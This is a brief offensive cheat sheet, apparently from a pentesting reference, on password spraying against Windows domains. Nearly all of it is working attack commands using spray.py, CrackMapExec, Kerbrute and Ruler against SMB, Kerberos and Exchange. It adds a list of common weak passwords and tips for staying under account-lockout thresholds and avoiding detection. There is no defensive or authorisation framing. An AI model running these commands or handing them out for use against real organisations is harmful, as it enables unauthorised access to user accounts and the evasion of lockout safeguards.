Spray ONE password across MANY accounts. Avoids lockout by staying under the threshold per account. Common weak passwords: Welcome1, Password1, Company2024!, Season+Year.
# Using Spray (Linux): spray.py -smb 192.168.1.10 -ul users.txt -p Welcome1 -t 1 # Using CrackMapExec: crackmapexec smb 192.168.1.10 -u users.txt -p Welcome1 --continue-on-success # Using Kerbrute (Kerberos spray — faster, more stealthy): kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt Welcome1 # Using Ruler (Exchange/OWA): ruler --domain corp.local brute --users users.txt --passwords passwords.txt # Safe spraying rules: # - Check lockout policy first: net accounts /domain # - Wait 30+ mins between sprays # - Spray 1 password per cycle